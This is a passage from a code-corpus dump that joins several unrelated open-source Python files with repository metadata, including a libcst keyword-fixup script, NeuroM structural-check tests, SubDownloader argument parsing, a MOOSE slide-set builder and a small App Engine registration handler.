paretovariate = _inst.paretovariate
weibullvariate = _inst.weibullvariate
getstate = _inst.getstate
setstate = _inst.setstate
getrandbits = _inst.getrandbits
|
kozec/SimplePython
|
src/random.py
|
Python
|
lgpl-3.0
| 15,856
|
[
"Gaussian"
] |
f7bba7a147d7719d3760fd4e2252e48c7383b960e5c67951f673cac318dff9bb
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import os
import libcst as cst
import pathlib
import sys
from typing import (Any, Callable, Dict, List, Sequence, Tuple)
def partition(
predicate: Callable[[Any], bool],
iterator: Sequence[Any]
) -> Tuple[List[Any], List[Any]]:
"""A stable, out-of-place partition."""
results = ([], [])
for i in iterator:
results[int(predicate(i))].append(i)
# Returns trueList, falseList
return results[1], results[0]
class tablesCallTransformer(cst.CSTTransformer):
CTRL_PARAMS: Tuple[str] = ('retry', 'timeout', 'metadata')
METHOD_TO_PARAMS: Dict[str, Tuple[str]] = {
'batch_create_rows': ('parent', 'requests', ),
'batch_delete_rows': ('parent', 'names', ),
'batch_update_rows': ('parent', 'requests', ),
'create_row': ('parent', 'row', 'view', ),
'delete_row': ('name', ),
'get_row': ('name', 'view', ),
'get_table': ('name', ),
'get_workspace': ('name', ),
'list_rows': ('parent', 'page_size', 'page_token', 'view', 'filter', ),
'list_tables': ('page_size', 'page_token', ),
'list_workspaces': ('page_size', 'page_token', ),
'update_row': ('row', 'update_mask', 'view', ),
}
def leave_Call(self, original: cst.Call, updated: cst.Call) -> cst.CSTNode:
try:
key = original.func.attr.value
kword_params = self.METHOD_TO_PARAMS[key]
except (AttributeError, KeyError):
# Either not a method from the API or too convoluted to be sure.
return updated
# If the existing code is valid, keyword args come after positional args.
# Therefore, all positional args must map to the first parameters.
args, kwargs = partition(lambda a: not bool(a.keyword), updated.args)
if any(k.keyword.value == "request" for k in kwargs):
# We've already fixed this file, don't fix it again.
return updated
kwargs, ctrl_kwargs = partition(
lambda a: a.keyword.value not in self.CTRL_PARAMS,
kwargs
)
args, ctrl_args = args[:len(kword_params)], args[len(kword_params):]
ctrl_kwargs.extend(cst.Arg(value=a.value, keyword=cst.Name(value=ctrl))
for a, ctrl in zip(ctrl_args, self.CTRL_PARAMS))
request_arg = cst.Arg(
value=cst.Dict([
cst.DictElement(
cst.SimpleString("'{}'".format(name)),
cst.Element(value=arg.value)
)
# Note: the args + kwargs looks silly, but keep in mind that
# the control parameters had to be stripped out, and that
# those could have been passed positionally or by keyword.
for name, arg in zip(kword_params, args + kwargs)]),
keyword=cst.Name("request")
)
return updated.with_changes(
args=[request_arg] + ctrl_kwargs
)
def fix_files(
in_dir: pathlib.Path,
out_dir: pathlib.Path,
*,
transformer=tablesCallTransformer(),
):
"""Duplicate the input dir to the output dir, fixing file method calls.
Preconditions:
* in_dir is a real directory
* out_dir is a real, empty directory
"""
pyfile_gen = (
pathlib.Path(os.path.join(root, f))
for root, _, files in os.walk(in_dir)
for f in files if os.path.splitext(f)[1] == ".py"
)
for fpath in pyfile_gen:
with open(fpath, 'r') as f:
src = f.read()
# Parse the code and insert method call fixes.
tree = cst.parse_module(src)
updated = tree.visit(transformer)
# Create the path and directory structure for the new file.
updated_path = out_dir.joinpath(fpath.relative_to(in_dir))
updated_path.parent.mkdir(parents=True, exist_ok=True)
# Generate the updated source file at the corresponding path.
with open(updated_path, 'w') as f:
f.write(updated.code)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="""Fix up source that uses the tables client library.
The existing sources are NOT overwritten but are copied to output_dir with changes made.
Note: This tool operates at a best-effort level at converting positional
parameters in client method calls to keyword based parameters.
Cases where it WILL FAIL include
A) * or ** expansion in a method call.
B) Calls via function or method alias (includes free function calls)
C) Indirect or dispatched calls (e.g. the method is looked up dynamically)
These all constitute false negatives. The tool will also detect false
positives when an API method shares a name with another method.
""")
parser.add_argument(
'-d',
'--input-directory',
required=True,
dest='input_dir',
help='the input directory to walk for python files to fix up',
)
parser.add_argument(
'-o',
'--output-directory',
required=True,
dest='output_dir',
help='the directory to output files fixed via un-flattening',
)
args = parser.parse_args()
input_dir = pathlib.Path(args.input_dir)
output_dir = pathlib.Path(args.output_dir)
if not input_dir.is_dir():
print(
f"input directory '{input_dir}' does not exist or is not a directory",
file=sys.stderr,
)
sys.exit(-1)
if not output_dir.is_dir():
print(
f"output directory '{output_dir}' does not exist or is not a directory",
file=sys.stderr,
)
sys.exit(-1)
if os.listdir(output_dir):
print(
f"output directory '{output_dir}' is not empty",
file=sys.stderr,
)
sys.exit(-1)
fix_files(input_dir, output_dir)
|
googleapis/python-area120-tables
|
scripts/fixup_tables_v1alpha1_keywords.py
|
Python
|
apache-2.0
| 6,502
|
[
"VisIt"
] |
90ef4d67c093af05c37da78cfbf173e8a4f27049e54a6e0df9b6499446e8adea
|
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from pathlib import Path
from neurom import io
from neurom.check import structural_checks as chk
from nose import tools as nt
DATA_PATH = Path(__file__).parent.parent.parent.parent / 'test_data'
SWC_PATH = Path(DATA_PATH, 'swc')
H5V1_PATH = Path(DATA_PATH, 'h5/v1')
class TestIOCheckFST(object):
def setup(self):
self.load_data = io.load_data
def test_has_sequential_ids_good_data(self):
files = [Path(SWC_PATH, f)
for f in ['Neuron.swc',
'Single_apical_no_soma.swc',
'Single_apical.swc',
'Single_basal.swc',
'Single_axon.swc',
'Neuron_zero_radius.swc',
'sequential_trunk_off_0_16pt.swc',
'sequential_trunk_off_1_16pt.swc',
'sequential_trunk_off_42_16pt.swc',
'Neuron_no_missing_ids_no_zero_segs.swc']
]
for f in files:
ok = chk.has_sequential_ids(self.load_data(f))
nt.ok_(ok)
nt.ok_(len(ok.info) == 0)
def test_has_sequential_ids_bad_data(self):
f = Path(SWC_PATH, 'Neuron_missing_ids.swc')
ok = chk.has_sequential_ids(self.load_data(f))
nt.ok_(not ok)
nt.eq_(list(ok.info), [6, 217, 428, 639])
def test_has_increasing_ids_good_data(self):
files = [Path(SWC_PATH, f)
for f in ['Neuron.swc',
'Single_apical_no_soma.swc',
'Single_apical.swc',
'Single_basal.swc',
'Single_axon.swc',
'Neuron_zero_radius.swc',
'sequential_trunk_off_0_16pt.swc',
'sequential_trunk_off_1_16pt.swc',
'sequential_trunk_off_42_16pt.swc',
'Neuron_no_missing_ids_no_zero_segs.swc']
]
for f in files:
ok = chk.has_increasing_ids(self.load_data(f))
nt.ok_(ok)
nt.ok_(len(ok.info) == 0)
def test_has_increasing_ids_bad_data(self):
f = Path(SWC_PATH, 'non_increasing_trunk_off_1_16pt.swc')
ok = chk.has_increasing_ids(self.load_data(f))
nt.ok_(not ok)
nt.eq_(list(ok.info), [6, 12])
def test_is_single_tree_bad_data(self):
f = Path(SWC_PATH, 'Neuron_disconnected_components.swc')
ok = chk.is_single_tree(self.load_data(f))
nt.ok_(not ok)
nt.eq_(list(ok.info), [6, 217, 428, 639])
def test_is_single_tree_good_data(self):
f = Path(SWC_PATH, 'Neuron.swc')
ok = chk.is_single_tree(self.load_data(f))
nt.ok_(ok)
nt.eq_(len(ok.info), 0)
def test_has_no_missing_parents_bad_data(self):
f = Path(SWC_PATH, 'Neuron_missing_parents.swc')
ok = chk.no_missing_parents(self.load_data(f))
nt.ok_(not ok)
nt.eq_(list(ok.info), [6, 217, 428, 639])
def test_has_no_missing_parents_good_data(self):
f = Path(SWC_PATH, 'Neuron.swc')
ok = chk.no_missing_parents(self.load_data(f))
nt.ok_(ok)
nt.eq_(len(ok.info), 0)
def test_has_soma_points_good_data(self):
files = [Path(SWC_PATH, f)
for f in ['Neuron.swc',
'Single_apical.swc',
'Single_basal.swc',
'Single_axon.swc']]
files.append(Path(H5V1_PATH, 'Neuron_2_branch.h5'))
for f in files:
nt.ok_(chk.has_soma_points(self.load_data(f)))
def test_has_soma_points_bad_data(self):
f = Path(SWC_PATH, 'Single_apical_no_soma.swc')
nt.ok_(not chk.has_soma_points(self.load_data(f)))
def test_has_valid_soma_good_data(self):
dw = self.load_data(Path(SWC_PATH, 'Neuron.swc'))
nt.ok_(chk.has_valid_soma(dw))
dw = self.load_data(Path(H5V1_PATH, 'Neuron.h5'))
nt.ok_(chk.has_valid_soma(dw))
def test_has_valid_soma_bad_data(self):
dw = self.load_data(Path(SWC_PATH, 'Single_apical_no_soma.swc'))
nt.ok_(not chk.has_valid_soma(dw))
def test_has_finite_radius_neurites_good_data(self):
files = [Path(SWC_PATH, f)
for f in ['Neuron.swc',
'Single_apical.swc',
'Single_basal.swc',
'Single_axon.swc']]
files.append(Path(H5V1_PATH, 'Neuron_2_branch.h5'))
for f in files:
ok = chk.has_all_finite_radius_neurites(self.load_data(f))
nt.ok_(ok)
nt.ok_(len(ok.info) == 0)
def test_has_finite_radius_neurites_bad_data(self):
f = Path(SWC_PATH, 'Neuron_zero_radius.swc')
ok = chk.has_all_finite_radius_neurites(self.load_data(f))
nt.ok_(not ok)
nt.ok_(list(ok.info) == [194, 210, 246, 304, 493])
def test_has_no_missing_parents_bad_data(self):
try:
return super(TestIOCheckFST, self).test_has_no_missing_parents_bad_data()
except Exception:
return False
def test_has_sequential_ids_bad_data(self):
try:
return super(TestIOCheckFST, self).test_has_sequential_ids_bad_data()
except Exception:
return False
def test_has_valid_neurites_good_data(self):
dw = self.load_data(Path(SWC_PATH, 'Neuron.swc'))
nt.ok_(chk.has_valid_neurites(dw))
dw = self.load_data(Path(H5V1_PATH, 'Neuron.h5'))
nt.ok_(chk.has_valid_neurites(dw))
def test_has_valid_neurites_bad_data(self):
dw = self.load_data(Path(SWC_PATH, 'Soma_origin.swc'))
nt.ok_(not chk.has_valid_neurites(dw))
|
wizmer/NeuroM
|
neurom/check/tests/test_structural_checks.py
|
Python
|
bsd-3-clause
| 7,517
|
[
"NEURON"
] |
1b4d98ee0a35c3d3d32c815d5def2360040776f111d6e76fb8459e941ae39c74
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019 SubDownloader Developers - See COPYING - GPLv3
import argparse
from collections import namedtuple
import logging
from pathlib import Path
from subdownloader import project
from subdownloader.client import ClientType
from subdownloader.client.cli import CliAction
from subdownloader.client.logger import LOGGING_LOGNOTHING
from subdownloader.client.state import ProviderData, SubtitleNamingStrategy
from subdownloader.languages.language import Language, NotALanguageException
def parse_arguments(args=None):
"""
Parse the program arguments.
:return: ArgumentSettings object with the parsed arguments
"""
parser = get_argument_parser()
# Autocomplete arguments
try:
import argcomplete
argcomplete.autocomplete(parser)
except ImportError:
pass
ns = parser.parse_args(args=args)
if ns.client_type is None:
if ns.console or ns.interactive or ns.list_languages:
ns.client_type = ClientType.CLI
else:
ns.client_type = ClientType.GUI
elif ns.client_type is ClientType.GUI:
if ns.console or ns.interactive:
parser.error(_('Invalid arguments for GUI mode'))
video_path = ns.video_path
if video_path:
video_path = list(p.expanduser() for p in video_path)
return get_argument_options(
client=ArgumentClientSettings(
type=ns.client_type,
cli=ArgumentClientCliSettings(
console=ns.console,
interactive=ns.interactive,
list_languages=ns.list_languages,
),
gui=ArgumentClientGuiSettings(
),
),
log_path=ns.logfile,
log_level=ns.loglevel,
settings_path=ns.settings_path,
search_recursive=ns.recursive,
search_wd=video_path,
filter_languages=ns.languages,
naming_strategy=ns.naming_strategy,
providers=ns.providers,
test=ns.test,
)
def get_argument_options(client,
log_path=None,
log_level=None,
settings_path=None,
search_recursive=None,
search_wd=None,
filter_languages=None,
naming_strategy=SubtitleNamingStrategy.VIDEO_LANG,
providers=None,
test=None,):
return ArgumentSettings(
program=ArgumentProgramSettings(
log=ArgumentLogSettings(
path=log_path,
level=log_level,
),
settings=ArgumentSettingsSettings(
path=settings_path,
),
client=client,
),
search=ArgumentSearchSettings(
recursive=search_recursive,
working_directory=search_wd,
),
filter=FilterSettings(
languages=None if filter_languages is None else filter_languages,
),
download=DownloadSettings(
naming_strategy=naming_strategy,
),
providers=providers,
test=test,
)
ArgumentSettings = namedtuple('ArgumentSettings', (
'program',
'search',
'filter',
'download',
'providers',
'test',
))
ArgumentProgramSettings = namedtuple('ArgumentProgramSettings', (
'log',
'settings',
'client',
))
ArgumentLogSettings = namedtuple('ArgumentLogSettings', (
'path',
'level',
))
ArgumentSettingsSettings = namedtuple('ArgumentSettingsSettings', (
'path',
))
ArgumentClientSettings = namedtuple('ArgumentClientSettings', (
'type',
'cli',
'gui',
))
ArgumentClientCliSettings = namedtuple('ArgumentClientCliSettings', (
'console',
'interactive',
'list_languages',
))
ArgumentClientGuiSettings = namedtuple('ArgumentClientGuiSettings', (
))
ArgumentSearchSettings = namedtuple('ArgumentSearchSettings', (
'recursive',
'working_directory',
))
FilterSettings = namedtuple('FilterSettings', (
'languages',
))
DownloadSettings = namedtuple('DownloadSettings', (
'naming_strategy',
))
class LanguagesAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
try:
languages = [Language.from_unknown(value, xx=True, xxx=True, locale=True, name=True) for value in values]
setattr(namespace, self.dest, languages)
except NotALanguageException as e:
parser.error(_('{lang_str} is an unknown language.').format(lang_str=e.value))
class PathsAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
paths = [Path(value).expanduser().absolute() for value in values]
setattr(namespace, self.dest, paths)
class ProviderAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
providers = getattr(namespace, self.dest)
if providers is None:
providers = {}
setattr(namespace, self.dest, providers)
provider_str = values[0].lower()
try:
kwargs = providers[provider_str].kwargs
except KeyError:
kwargs = {}
for value in values[1:]:
try:
k, v = value.split('=', 1)
k, v = k.strip(), v.strip()
if not k:
raise ValueError()
if k in kwargs:
parser.error('Duplicate "{}"-provider key: {}'.format(provider_str, k))
kwargs[k] = v
except ValueError:
parser.error('Illegal {} argument: {}'.format(option_string, value))
providers[provider_str] = ProviderData(provider_str, kwargs)
def get_argument_parser():
"""
Get a parser that is able to parse program arguments.
:return: instance of arparse.ArgumentParser
"""
parser = argparse.ArgumentParser(description=project.get_description(),
epilog=_('Visit us at {website}.').format(website=project.WEBSITE_MAIN))
parser.add_argument('--version', action='version',
version='{project} {version}'.format(project=project.PROJECT_TITLE,
version=project.PROJECT_VERSION_STR))
parser.add_argument('-T', '--test', dest='test',
action='store_true', default=False,
help=argparse.SUPPRESS)
parser.add_argument('-V', '--video', dest='video_path', default=None, metavar='PATH',
nargs=argparse.ZERO_OR_MORE, action=PathsAction,
help=_('Full path to your video(s).'))
parser.add_argument('-s', '--settings', dest='settings_path', type=Path, default=None, metavar='FILE',
help=_('Set the settings file.'))
parser.add_argument('-l', '--lang', dest='languages', metavar='LANGUAGE',
default=[],
nargs=argparse.ONE_OR_MORE, action=LanguagesAction,
help=_('Set the preferred subtitle language(s) for download and upload.'))
# interface options
interface_group = parser.add_argument_group(_('interface'), _('Change settings of the interface'))
guicli = interface_group.add_mutually_exclusive_group()
guicli.add_argument('-g', '--gui', dest='client_type',
action='store_const', const=ClientType.GUI,
help=_('Run application in GUI mode. This is the default.'))
guicli.add_argument('-c', '--cli', dest='client_type',
action='store_const', const=ClientType.CLI,
help=_('Run application in CLI mode.'))
parser.set_defaults(client_type=None)
# logger options
loggroup = parser.add_argument_group(_('logging'), _('Change the amount of logging done.'))
loglvlex = loggroup.add_mutually_exclusive_group()
loglvlex.add_argument('-d', '--debug', dest='loglevel',
action='store_const', const=logging.DEBUG,
help=_('Print log messages of debug severity and higher to stderr.'))
loglvlex.add_argument('-w', '--warning', dest='loglevel',
action='store_const', const=logging.WARNING,
help=_('Print log messages of warning severity and higher to stderr. This is the default.'))
loglvlex.add_argument('-e', '--error', dest='loglevel',
action='store_const', const=logging.ERROR,
help=_('Print log messages of error severity and higher to stderr.'))
loglvlex.add_argument('-q', '--quiet', dest='loglevel',
action='store_const', const=LOGGING_LOGNOTHING,
help=_('Don\'t log anything to stderr.'))
loggroup.set_defaults(loglevel=logging.WARNING)
loggroup.add_argument('--log', dest='logfile', metavar='FILE', type=Path,
default=None, help=_('Path name of the log file.'))
# cli options
cli_group = parser.add_argument_group(_('cli'), _('Change the behavior of the command line interface.'))
cli_group.add_argument('-C', '--console', dest='console',
action='store_true', default=False,
help=_('Start a console.'))
cli_group.add_argument('-i', '--interactive', dest='interactive',
action='store_true', default=False,
help=_('Prompt user when decisions need to be done.'))
cli_group.add_argument('-r', '--recursive', dest='recursive',
action='store_true', default=False,
help=_('Search for subtitles recursively.'))
cli_group.add_argument('--list-languages', dest='list_languages',
action='store_true', default=False,
help=_('List available languages and quit.'))
operation_group = cli_group.add_mutually_exclusive_group()
operation_group.add_argument('-D', '--download', dest='operation', action='store_const', const=CliAction.DOWNLOAD,
help=_('Download subtitle(s). This is the default.'))
operation_group.add_argument('-U', '--upload', dest='operation', action='store_const', const=CliAction.UPLOAD,
help=_('Upload subtitle(s).'))
# operation_group.add_argument('-L', '--list', dest='operation', action='store_const', const=CliAction.LIST,
# help=_('List available subtitle(s) without downloading.'))
parser.set_defaults(operation=CliAction.DOWNLOAD)
naming_group = cli_group.add_mutually_exclusive_group()
naming_group.add_argument('--name-online', dest='naming_strategy', action='store_const',
const=SubtitleNamingStrategy.ONLINE,
help=_('Use the on-line subtitle filename as name for the downloaded subtitles.'))
naming_group.add_argument('--name-video', dest='naming_strategy', action='store_const',
const=SubtitleNamingStrategy.VIDEO,
help=_('Use the local video filename as name for the downloaded subtitle.'))
naming_group.add_argument('--name-lang', dest='naming_strategy', action='store_const',
const=SubtitleNamingStrategy.VIDEO_LANG,
help=_('Use the local video filename + language as name for the downloaded subtitle.')
+ ' ' + _('This is the default.'))
naming_group.add_argument('--name-uploader', dest='naming_strategy', action='store_const',
const=SubtitleNamingStrategy.VIDEO_LANG_UPLOADER,
help=_('Use the local video filename + uploader + language '
'as name for the downloaded subtitle.'))
parser.set_defaults(naming_strategy=SubtitleNamingStrategy.VIDEO_LANG)
# online options
online_group = parser.add_argument_group('online', 'Change parameters related to the online provider.')
online_group.add_argument('--provider', dest='providers', metavar='NAME [KEY1=VALUE1 [KEY2=VALUE2 [...]]]',
nargs=argparse.ONE_OR_MORE, default=None, action=ProviderAction,
help=_('Enable and configure a provider.'))
return parser
|
subdownloader/subdownloader
|
subdownloader/client/arguments.py
|
Python
|
gpl-3.0
| 12,582
|
[
"VisIt"
] |
65ef148e0d6ad36ef5684a9cfe55f3a3f553a5ca974a57515e540661c72c9e72
|
# $Id$
#
# Copyright (C) 2000-2006 greg Landrum
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" Matrix operations which may or may not come in handy some day
**NOTE**: the two functions defined here have been moved to ML.Data.Stats
"""
from __future__ import print_function
import sys
from rdkit.ML import files
from rdkit.ML.Data import Stats
FormCovarianceMatrix = Stats.FormCovarianceMatrix
PrincipalComponents = Stats.PrincipalComponents
if __name__ == '__main__':
fileN = sys.argv[1]
iV, dV = files.ReadDataFile(fileN)
eVals, eVects = PrincipalComponents(iV)
print('eVals: ', eVals)
print('eVects:', eVects)
|
rvianello/rdkit
|
rdkit/ML/MatOps.py
|
Python
|
bsd-3-clause
| 813
|
[
"RDKit"
] |
41a2cc4aa664ea9fdafe0862499d5f96855d2d2789e77eb334bfad6a3e1e01a2
|
# Load python packages
import re, sys, math
from collections import OrderedDict
# Load Moose packages
from FactorySystem import MooseObject
from ..slides import RemarkSlide, SlideWarehouse
##
# Base class for markdown slide generation
class RemarkSlideSet(MooseObject):
##
# Defines the available properties for the SlideSet base class
@staticmethod
def validParams():
params = MooseObject.validParams()
params.addRequiredParam('type', 'The type of slide set to create')
params.addParam('title', 'The title of the slide set, if this exists a title slide will be injected')
params.addParam('active', [], 'A list of ordered slide names to output, if blank all slides are output')
params.addParam('inactive', [], 'A list of slide names to exclude from output')
params.addParam('contents', False, 'Include table of contents slide')
params.addParam('contents_title', 'The table-of-contents heading for this slide set')
params.addParam('contents_level', 1, 'The heading level to include in the contents')
params.addParam('contents_items_per_slide', 15, 'The number of contents items to include on a page')
params.addParam('show_in_contents', True, 'Toggle if slide set content appears in the table-of-contents')
params.addParam('style', 'The CSS style sheet to utilize for this slide set')
params.addParam('non_ascii_warn', True, 'Produce warning if non-ascii characters are located')
# Create the common parameters from RemarkSlide 'properties' group
slide_params = RemarkSlide.validParams()
for key in slide_params.groupKeys('properties'):
params.addParam(key, slide_params.getDescription(key))
params.addParamsToGroup('properties', slide_params.groupKeys('properties'))
return params
##
# Constructor
# @param name The name of the object
# @param params The InputParameters for the object being created
# @param kwars Optional key, value pairings
#
# Optional key, value pairs:
# slide_type = <str>
# The name of the Slide class to build, by default 'Slide' is used
def __init__(self, name, params, **kwargs):
MooseObject.__init__(self, name, params)
# Set the Slide type
self.__slide_type = kwargs.pop('slide_type', 'RemarkSlide')
# Get a reference to the items needed to create objects
self.__factory = self.getParam('_factory')
self.__parser = self.getParam('_parser')
self.__root = self.getParam('_root')
# Create a storage object for the slides created by this set
self.__slide_warehouse = SlideWarehouse(set_name = name, \
active = self.getParam('active'), \
inactive = self.getParam('inactive'))
# Storage for markdown links
self.__links = []
# Print a message
print ' ', name
##
# The method that creates/retrieves the markdown (virtual)
def read(self):
return ''
##
# Returns a reference to the SlideWarehouse object
def warehouse(self):
return self.__slide_warehouse
##
# Creates the individual RemarkSlide objects
# @param raw The raw markdown, obtained from read() method, to separate into slides
def build(self, markdown):
# Extract links
markdown = re.sub(r'\[.*?\]:.*?\n', self.__subLinkStorage, markdown)
# Separate the slide content
raw_slides = re.split(r'\n---', markdown)
# Build the individual slide objects
for raw in raw_slides:
if raw:
slide = self.__createSlide(raw)
self.warehouse().addObject(slide)
# Create the title slide
if self.isParamValid('title'):
name = self.name() + '-title'
raw = '# ' + self.getParam('title') + '\n'
options = {'show_in_contents':False, 'title':True, 'name':name, 'class':'center,middle'}
slide = self.__createSlide(raw, **options)
self.warehouse().insertObject(0, slide)
##
# Return the complete markdown for this slide set
def markdown(self):
# Create a list of all the slide markdown
output = []
# Extract the slide content
for slide in self.warehouse().activeObjects():
output.append(slide.markdown)
# Join the list with slide breaks
output = '\n---\n'.join(output)
# Append the links
for link in self.__links:
output += link + '\n'
return output
##
# Sub method for storing wiki link shortcuts
def __subLinkStorage(self, match):
self.__links.append(match.group(0).replace(r'\r\n',''))
return ''
##
# Create the a slide from raw markdown (private)
# @param raw The raw markdown to build the slide from
# @param kwargs Optional key, value pairs
#
def __createSlide(self, raw, **kwargs):
# Get the default input parameters from the slide being created
params = self.__factory.validParams('RemarkSlide')
params.applyParams(self.parameters())
# Add the parent and markdown parameters
params.addPrivateParam('_parent', self)
# Over-ride parameters with optional key, value pairs
for key, value in kwargs.iteritems():
params[key] = value
# Build the slide object
slide = self.__factory.create(self.__slide_type, params)
# Determine and set the slide name
raw = slide.parseName(raw)
# Apply the [./Slides] block
if self.__root:
node = self.__root.getNode(self.name()).getNode('Slides')
if node:
node = node.getNode(slide.name())
if node:
print ' '*6 + 'Apply settings from input file'
self.__parser.extractParams('', slide.parameters(), node)
# Parse the raw markdown and store it in the slide
self._parseSlide(slide, raw)
return slide
##
# Method that calls the various parse methods for the slide content (protected)
# This also applies settings from the input file, this method exists to
# allow parent classes to modify slide settings
# @see INLDjangoWikiSet, INLCoverSet, INLMergeSet
def _parseSlide(self, slide, raw):
# Parse the content into Remark format and store the content in the slide
raw = slide.parse(raw)
raw = slide.parseImages(raw)
slide.markdown = raw
##
# A helper that extracts the contents entries from each of the active slides (protected)
def _extractContents(self):
contents = []
# Loop through all active slides
for slide in self.warehouse().activeObjects():
# Do nothing if the contents for the slides are disabled
if not slide.getParam('show_in_contents'):
continue
# Build a tuple containing the table-of-contents information for this slide
pattern = re.compile(r'^\s*(#+)\s+(.*)', re.MULTILINE)
for m in pattern.finditer(slide.markdown):
contents.append((m.group(2).strip(), slide.name(), len(m.group(1)), slide.number))
# Separate contents into chunks based on the allowable size
n = int(self.getParam('contents_items_per_slide'))
output = [contents[i:i+n] for i in range(0, len(contents),n)]
return output
##
# A helper method that creates the empty contents slides (protected)
# @param number The number of contents entries
def _createContentsSlides(self, n):
# Determine the table of contents header
if self.isParamValid('contents_title'):
contents_title = '# ' + self.getParam('contents_title') + '\n'
elif self.isParamValid('title'):
contents_title = '# ' + self.getParam('title') + ' Contents\n'
else:
contents_title = '# Contents\n'
# Locate the slide insert location
if self.warehouse().hasObject(self.name() + '-title'):
idx = 1
else:
idx = 0
# Add the content(s) slides
for i in range(n):
name = '-'.join([self.name(), 'contents', str(i)])
options = {'name' : name, 'show_in_contents' : False}
if i == 0:
slide = self.__createSlide(contents_title, **options)
else:
slide = self.__createSlide('', **options)
self.warehouse().insertObject(idx, slide)
idx += 1
##
# Initialize contents (public)
# This creates and inserts the correct number of contents slides
# @see SlideSetWarehouse::__contents
def initContents(self):
# Do nothing if the 'contents' flag is not set in the input file
if not self.getParam('contents'):
return
# Extract the contents entries
contents = self._extractContents()
# Create the contents slides
self._createContentsSlides(len(contents))
##
# Inserts the table-of-contents html into the already existing contents slides (public)
# @see SlideSetWarehouse::__contents
def contents(self):
# Do nothing if the 'contents' flag is not set in the input file
if not self.getParam('contents'):
return
# Extract the contents entries
contents = self._extractContents()
# Build the table-of-contents entries
max_per_slide = int(self.getParam('contents_items_per_slide'))
lvl = int(self.getParam('contents_level'))
for i in range(len(contents)):
output = ''
for item in contents[i]:
if item[2] <= lvl:
title = item[0] # the heading content
name = item[1] # slide name
indent = 25*(item[2]-1) # heading level indenting
idx = str(item[3]) # slide index
height = '12px'
# Build a link to the slide, by name
link = '<a href="#' + name + '">'
# Create the contents entry
output += '<p style="line-height:' + height + ';text-align:left;text-indent:' + str(indent) + 'px;">' + link + title + '</a>'
output += '<span style="float:right;">' + link + idx + '</a>'
output += '</span></p>\n'
# Write the contents to the slide
name = '-'.join([self.name(), 'contents', str(i)])
self.warehouse().getObject(name).markdown += output
|
mellis13/moose
|
python/PresentationBuilder/slidesets/RemarkSlideSet.py
|
Python
|
lgpl-2.1
| 9,831
|
[
"MOOSE"
] |
636129ff0bf4a4499b1ed48e8dd6365878d9adb62921a7214276535ddb2125d7
|
# Copyright 2014 Roberto Brian Sarrionandia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import webapp2
from google.appengine.ext import ndb
import tusers
import logging
from models import InstitutionTeam, InstitutionJudge
class RegHandler(webapp2.RequestHandler):
def get(self):
user = tusers.get_current_user()
#Get the institution
i = self.request.get('i')
i_key = ndb.Key(urlsafe=i)
institution = i_key.get()
reg = i_key.parent().get()
if institution.authorised(user) and reg.open and institution.teams().count(limit=20)<20:
if self.request.get('type') == 't':
#Register a new Team
team = InstitutionTeam(parent=institution.key)
team.put()
if self.request.get('type') == 'j':
#Register a new judge
judge = InstitutionJudge(parent=institution.key)
judge.put()
self.redirect(self.request.referer)
app = webapp2.WSGIApplication([
('/add_to_reg', RegHandler)
], debug=True)
|
sarrionandia/tournatrack
|
reg_add.py
|
Python
|
apache-2.0
| 1,433
|
[
"Brian"
] |
6d76afa388427ef06d0fd2869b807faaf80cbe900665a9a0a637f7d3e942a650
|
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from django.views import defaults as default_views
from neural_exploration.visualize.views import SpikeDataView
urlpatterns = [
url(r'^$', view=SpikeDataView, name='home'),#TemplateView.as_view(template_name='pages/home.html'), name='home'),
